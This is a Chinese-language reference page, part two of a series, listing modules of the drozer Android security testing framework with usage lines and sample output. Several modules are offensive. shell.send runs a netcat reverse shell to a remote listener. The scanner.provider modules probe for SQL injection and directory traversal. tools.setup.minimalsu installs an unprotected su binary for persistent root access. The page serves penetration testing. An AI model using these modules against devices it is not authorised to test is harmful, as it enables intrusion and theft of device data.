Drozer模块命令大全(二)

目录

  • 目录
  • 模块列表

模块列表

模块 作用
auxiliary.webcontentresolver 开启web服务来获取content providers
exploit.jdwp.check 针对@jdwp-control漏洞
exploit.pilfer.general.apnprovider 获取APN信息
exploit.pilfer.general.settingsprovider 查看系统设置
information.datetime 查看设备时间
information.deviceinfo 获取设备详细信息
information.permissions 列出所有手机应用使用过的权限信息
scanner.activity.browsable 获取可以从浏览器查看的activity
scanner.misc.native 列出包含native的包
scanner.misc.readablefiles 查找可被其应用读取的文件
scanner.misc.secretcodes 查找手机暗码
scanner.misc.writablefiles 查找能被其他应用写数据权限的文件
scanner.provider.finduris 查找content providers URI链接
scanner.provider.injection 查找content providers SQL注入
scanner.provider.sqltables 通过SQL注入查找表名
scanner.provider.traversal 查找目录遍历漏洞
shell.exec 执行单条shell命令
shell.send 发送ASH shell到远程监听器
shell.start 进入shell模式
tools.file.download 下载手机上的文件
tools.file.md5sum 获取文件的md5
tools.file.size 获取文件大小
tools.file.upload 从PC上传文件到设备
tools.setup.busybox 安装Busybox
tools.setup.minimalsu 安装minimal-su

auxiliary.webcontentresolver

usage: run auxiliary.webcontentresolver [-h] [-p PORT]

开启一个web服务,可以和手机上的content provider连接,还可以和sqlmap联合使用。

Examples:
dz> run auxiliary.webcontentresolver –port 8080

WebContentResolver started on port 8080.
Ctrl+C to Stop

Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)

optional arguments:

模块 作用
-p PORT, –port PORT 设置web端口

exploit.jdwp.check

usage: run exploit.jdwp.check [-h]

这个模块针对一个漏洞,安卓2.3版本可调试的app都会去寻找一个叫@jdwp-control的UNIX套接字。

Examples:
dz> run exploit.jdwp.check
[+] Opened @jdwp-control
[*] Accepting connections

[+] com.mwr.dz connected!
[+] Received PID = 4931
[+] This device is vulnerable!

[+] com.mwr.dz connected!
[+] Received PID = 4940
[+] This device is vulnerable!

Last Modified: 2014-07-29
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


exploit.pilfer.general.apnprovider

usage: run exploit.pilfer.general.apnprovider [-h]

获取APN信息, APN,全写是Access Point Name,即“接入点名称”,是您在通过手机上网时必须配置的一个参数,它决定了您的手机通过哪种接入方式来访问网络。

The target provider is content://telephony/carriers/preferapn

Examples:
dz> run exploit.pilfer.general.apnprovider
_id 1
name T-Mobile US
numeric 310260
mcc 310
mnc 260
apn epc.tmobile.com
… …

Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


exploit.pilfer.general.settingsprovider

usage: run exploit.pilfer.general.settingsprovider [-h]

查看系统设置

Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


information.datetime

usage: run information.datetime [-h]

查看安卓设备的时间

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


information.deviceinfo

usage: run information.deviceinfo [-h]

获取设备详细信息

Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


information.permissions

usage: run information.permissions [-h] [–permission PERMISSION] [–protectionlevel PROTECTIONLEVEL]

列出所有手机应用使用过的权限信息。

Examples:
dz> run information.permissions –permission android.permission.INSTALL_PACKAGES
Allows the app to install new or updated Android packages. Malicious apps may use this to add new apps with arbitrarily
powerful permissions.
18 - signature|system

Last Modified: 2014-06-17
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

optional arguments:

模块 作用
–permission PERMISSION 指定权限
–protectionlevel PROTECTIONLEVEL 指定保护等级

scanner.activity.browsable

usage: run scanner.activity.browsable [-a] [–package PACKAGE ][-f] [–filter FILTER ]

找出所有可浏览的activity

Package: com.android.contacts
Invocable URIs:
tel://
Classes:
.activities.PeopleActivity
com.android.contacts.NonPhoneActivity

Package: com.android.calendar
Invocable URIs:
http://www.google.com/calendar/event (PATTERN_PREFIX)
Classes:
GoogleCalendarUriIntentFilter

Package: com.android.browser
Invocable URIs:
http://
Classes:
BrowserActivity

Package: com.android.music
Invocable URIs:
http://
content://
Classes:
AudioPreview

Package: com.android.mms
Invocable URIs:
sms://
mms://
Classes:
.ui.ComposeMessageActivity

Last Modified: 2014-10-31
Credit: Tyrone (@mwrlabs)
License: BSD (3-clause)

optional arguments:

模块 作用
-a PACKAGE, –package PACKAGE 指定包名
-f FILTER, –filter FILTER 指定关键词

scanner.misc.native

usage: run scanner.misc.native [-h] [-a PACKAGE] [-f FILTER] [-v]

列出包含native的包
注意: 只检查包捆绑的lib文件来判断

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:

模块 作用
-a PACKAGE, –package PACKAGE 指定包名
-f FILTER, –filter FILTER 指定关键词
-v, –verbose 显示未包含的包

scanner.misc.readablefiles

usage: run scanner.misc.readablefiles [-h] [-p] target

查找可被其应用读取的文件

Examples:
dz> run scanner.misc.readablefiles /data -p
Discovered world-readable files in /data:
/data/system/packages-stopped.xml
/data/system/packages.list
/data/system/packages.xml
/data/system/uiderrors.txt
……

Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
target the target directory to search

optional arguments:

模块 作用
-p, –privileged 有root权限

scanner.misc.secretcodes

usage: run scanner.misc.secretcodes [-h] [-v]

查找手机暗码,具体参考:
http://blog.csdn.net/huangjuecheng/article/details/7261211?spm=5176.100239.blogcont61513.10.a86Q5r

Last Modified: 2012-11-06
Credit: Mike (@mwrlabs)
License: BSD (3 clause)

optional arguments:

模块 作用
-v, –verbose 显示详细信息

scanner.misc.writablefiles

usage: run scanner.misc.writablefiles [-h] [-p] target

查找能被其他应用写数据权限的文件

Examples:
dz> run scanner.misc.writablefiles /data –privileged
Discovered world-writable files in /data:
/data/anr/slow00.txt
/data/anr/slow01.txt
……

Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
target the target directory to search

optional arguments:

模块 作用
-v, –verbose 显示详细信息

scanner.provider.finduris

usage: run scanner.provider.finduris [-h] [-a PACKAGE]

查找content providers URI链接

Examples:
run scanner.provider.finduris

Last Modified: 2012-11-06
Credit: Luander ([email protected])
License: BSD (3 clause)

optional arguments:

模块 作用
-a PACKAGE, –package PACKAGE 指定包名

scanner.provider.injection

usage: run scanner.provider.injection [-h] [-a ]

查找SQL注入

Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)

optional arguments:

模块 作用
-a , –package , –uri 指定包名或者uri

scanner.provider.sqltables

usage: run scanner.provider.sqltables [-h] [-a ]

Enumerate SQL tables accessible through SQL (projection) Injection vulnerabilities.

Last Modified: 2013-01-23
Credit: Rijnard
License: BSD (3 clause)

optional arguments:

模块 作用
-a , –package , –uri 指定包名或者uri

scanner.provider.traversal

usage: run scanner.provider.traversal [-h] [-a ]

查找目录遍历漏洞

Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)

optional arguments:

模块 作用
-a , –package , –uri 指定包名或者uri

shell.exec

usage: run shell.exec [-h] command

执行单条shell命令

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
command the Linux command to execute

optional arguments:
-h, –help


shell.send

usage: run shell.send [-h] ip port

发送ASH shell到远程监听器

This module executes nc IP PORT -e ash -i, using BusyBox. This will send an ASH shell to a netcat listener.

Last Modified: 2013-07-25
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

positional arguments:
ip ip address of the remote listener
port port address of the remote listener

optional arguments:
-h, –help


shell.start

usage: run shell.start [-h]

进入shell模式

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


tools.file.download

usage: run tools.file.download [-h] source destination

从手机设备下载文件到pc

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
source
destination

optional arguments:
-h, –help


tools.file.md5sum

usage: run tools.file.md5sum [-h] target

md5 Checksum of File

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
target

optional arguments:
-h, –help


tools.file.size

usage: run tools.file.size [-h] target

获取文件大小

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
target

optional arguments:
-h, –help


tools.file.upload

usage: run tools.file.upload [-h] source destination

从PC上传文件到设备

Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)

positional arguments:
source
destination

optional arguments:
-h, –help


tools.setup.busybox

usage: run tools.setup.busybox [-h]

安装Busybox

Busybox provides a number of *nix utilities that are missing from Android. Some modules require Busybox to be installed.

Typically, you require root access to the device to install Busybox. drozer can install it from its restrictive context. You can
then use ‘busybox’ in the when executing shell commands from drozer to use it.

Last Modified: 2012-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help


tools.setup.minimalsu

usage: run tools.setup.minimalsu [-h]

Prepares ‘minimal-su’ binary installation files on the device in order to provide access to a root shell on demand.

安装minimal来可以获取暂时的root权限

This binary provides drozer the ability to maintain access to a root shell on the device after obtaining a temporary root shell
via the use of an exploit. Just type su from a shell to get a root shell.

WARNING: This minimal version of the su binary is completely unprotected, meaning that any application on the device can obtain a
root shell without any user prompting.

Examples:
dz> run tools.setup.minimalsu
[*] Uploaded minimal-su
[*] Uploaded install-minimal-su.sh
[*] chmod 770 /data/data/com.mwr.dz/install-minimal-su.sh
[*] Ready! Execute /data/data/com.mwr.dz/install-minimal-su.sh from root context to install su

…insert root exploit here…
u0_a95@android:/data/data/com.mwr.dz # /data/data/com.mwr.dz/install-minimal-su.sh
Done. You can now use su from a shell.
u0_a95@android:/data/data/com.mwr.dz # exit
u0_a95@android:/data/data/com.mwr.dz $ su
u0_a95@android:/data/data/com.mwr.dz #

Last Modified: 2013-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)

optional arguments:
-h, –help

你可能感兴趣的:(android)